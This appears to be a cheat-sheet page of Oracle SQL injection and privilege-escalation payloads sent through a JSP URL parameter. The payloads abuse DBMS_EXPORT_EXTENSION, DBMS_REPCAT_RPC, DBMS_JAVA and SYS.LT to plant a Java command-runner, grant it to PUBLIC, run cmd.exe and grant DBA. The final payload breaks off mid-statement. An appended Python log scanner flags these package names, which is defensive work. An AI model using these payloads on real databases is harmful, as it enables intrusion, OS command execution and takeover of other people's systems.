
Summary of Oracle blind and error-based injection statements and Oracle privilege-escalation statements

and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT].PUT(:P1);EXECUTE IMMEDIATE]DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ]]begin dbms_java.grant_permission(]]]PUBLIC]]]], ]]]]SYS:java.io.FilePermission]]]],]]]]<>]]]], ]]]]execute]]]]);end;]];END;];END;–’,'SYS’,0,’1′,0) from dual) is not null-

Create Function

http://ooo/1. jsp ?1=String'’ and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT] .PUT(:P1);EXECUTE IMMEDIATE ]DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ]]create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ]]]]LinxUtil.runCMD(java.lang.String) return String]]]]; ]];END;];END;–’,'SYS’,0,’1′,0) from dual) is not null-

Grant function execute privilege

http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT].PUT(:P1);EXECUTE IMMEDIATE ]DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ]]grant all on LinxRunCMD to public]];END;];END;–’,'SYS’,0,’1′,0) from dual) is not null –

Execute OS code

http://ooo/1.jsp?1=String'’ and (select sys.LinxRunCMD(‘cmd.exe /c whoami’) from dual) is not null-

Using Java permissions

Affected versions: 10g R2, 11g R1 and 11g R2

a) DBMS_JAVA.RUNJAVA

Affected versions: 11gR1, 11gR2

http://ooo/1.jsp?1=String'’ and (SELECT DBMS_JAVA.RUNJAVA (‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>C:\\OUT.LST’) FROM DUAL) is not null –

b) DBMS_JAVA_TEST.FUNCALL

Affected versions: 10g R2, 11g R1, 11g R2

http://ooo/1.jsp?1=String'’ and (Select DBMS_JAVA_TEST.FUNCALL (‘oracle/aurora/util/Wrapper’,'main’,'c:\\windows\\system32\\cmd.exe’,'/c’,'dir>c:\\OUT2.LST’) FROM DUAL) is not null—

DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC

Affected versions: Oracle 8, 9, 10g R1, 10g R2, 11g R1

1. Create Library

http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ]DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ]]create or replace and compile java source named [LinxUtil] as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=]";while ((stemp = myReader.readLine()) != null) str+=stemp+]\n];myReader.close();return str;} catch (Exception e){returne.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=]";while ((stemp = myReader.readLine()) != null) str +=stemp+]\n];myReader.close();return str;} catch (Exception e){return e.toString();}}}]];END;];END;–‘,’CCCCC’) from dual) is not null-

2. Granting JAVA permissions

http://www.2cto.com /1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ]DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ]]create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ]]]]LinxUtil.runCMD(java.lang.String) return String]]]];]];END;];END;–’,'CCCCC’) from dual) is not null –

3. Making function executable by PUBLIC

http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ]DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGINEXECUTE IMMEDIATE ]]grant all on LinxRunCMD to public]];END;];END;–‘,’CCCCC’) from dual) is not null –

4. Executing OS Code

http://ooo/1.jsp?1=String'’ and (select sys.LinxRunCMD(‘cmd.exe /c whoami ‘) from dual) is not null –

After patching: requires the CREATE PROCEDURE privilege

1. Create Function

http://www.2cto.com /default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ]create or replace function pwn2 return varchar2 authid current_user is PRAGMA autonomous_transaction;BEGIN execute immediate ]]grant dba to scott]];commit;return ]]z]];END; ]; commit; end;’) from dual) is not null –

2. Exploiting SYS.LT

http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ] begin SYS.LT.CREATEWORKSPACE(]]A10]]]] and scott.pwn2()=]]]]x]]); YS.LT.REMOVEWORKSPACE(]]A10]]]] and scott.pwn2()=]]]]x]]);end;]; commit; end;’) from dual) is not null –

Let’s look at the Critical Patch Update (CPU) of October 2010 (vulnerable versions 10gR1, 10gR2, 11g R1 and 11gR2) and at the vulnerability in sys.dbms_cdc_publish.create_change_set, which allows a user with the EXECUTE_CATALOG_ROLE privilege to become DBA.

http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMAAUTONOMOUS_TRANSACTION
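For defenders, the statements listed above share a small set of Oracle package and procedure names that ordinary web requests have no reason to carry. The following is an added example, not part of the original page: a log scanner that flags those names in HTTP access logs. The function names, the log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Identifiers copied from the statements on this page; the labels are editorial.
MARKERS = {
    "DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES": "injectable SYS procedure",
    "DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC": "injectable SYS procedure",
    "DBMS_JAVA.RUNJAVA": "Java call used to reach the OS",
    "DBMS_JAVA_TEST.FUNCALL": "Java call used to reach the OS",
    "DBMS_JAVA.GRANT_PERMISSION": "Java permission grant",
    "DBMS_XMLQUERY.NEWCONTEXT": "PL/SQL block run from a SELECT",
    "LT.CREATEWORKSPACE": "SYS.LT workspace procedure",
    "LT.REMOVEWORKSPACE": "SYS.LT workspace procedure",
    "DBMS_CDC_PUBLISH.CREATE_CHANGE_SET": "EXECUTE_CATALOG_ROLE to DBA",
}
# Tolerate whitespace around the dot; \b keeps "SALT.CREATEWORKSPACE" from matching.
PATTERNS = {
    name: re.compile(r"\b" + r"\s*\.\s*".join(map(re.escape, name.split("."))) + r"\b")
    for name in MARKERS
}
# Dynamic-SQL keywords that accompany the package calls in the statements above.
CONTEXT = re.compile(r"EXECUTE\s+IMMEDIATE|AUTONOMOUS_TRANSACTION")

def normalise(raw, max_rounds=3):
    """URL-decode until stable (bounded), collapse whitespace, upper-case."""
    text = raw
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text).upper()

def scan_line(line):
    """Return the identifiers found in one log line, or None if there are none."""
    text = normalise(line)
    hits = sorted(name for name, rx in PATTERNS.items() if rx.search(text))
    severity = "high" if CONTEXT.search(text) else "medium"
    why = sorted({MARKERS[h] for h in hits})
    return {"markers": hits, "why": why, "severity": severity} if hits else None

def scan_log(lines):
    """Return (line number, finding) pairs for every flagged line."""
    return [(n, hit) for n, line in enumerate(lines, 1) if (hit := scan_line(line))]

# Constructed access-log lines; statement arguments are deliberately elided.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /1.jsp?1=String HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /1.jsp?1=String%27+and+(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(<elided>EXECUTE+IMMEDIATE<elided>)+from+dual)+is+not+null HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /default.jsp?1=1%2520and%2520(select%2520dbms_xmlquery.newcontext(<elided>)%2520from%2520dual) HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /1.jsp?1=String%27+and+(SELECT+DBMS_JAVA.RUNJAVA(<elided>)+FROM+DUAL) HTTP/1.1" 200 512',
]
```

Calling `scan_log(SAMPLE_LOG)` flags lines 2 to 4 and rates line 2 `high` because it also carries `EXECUTE IMMEDIATE`. A hit means the request should be reviewed alongside the database audit trail; it does not show that the statement executed.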
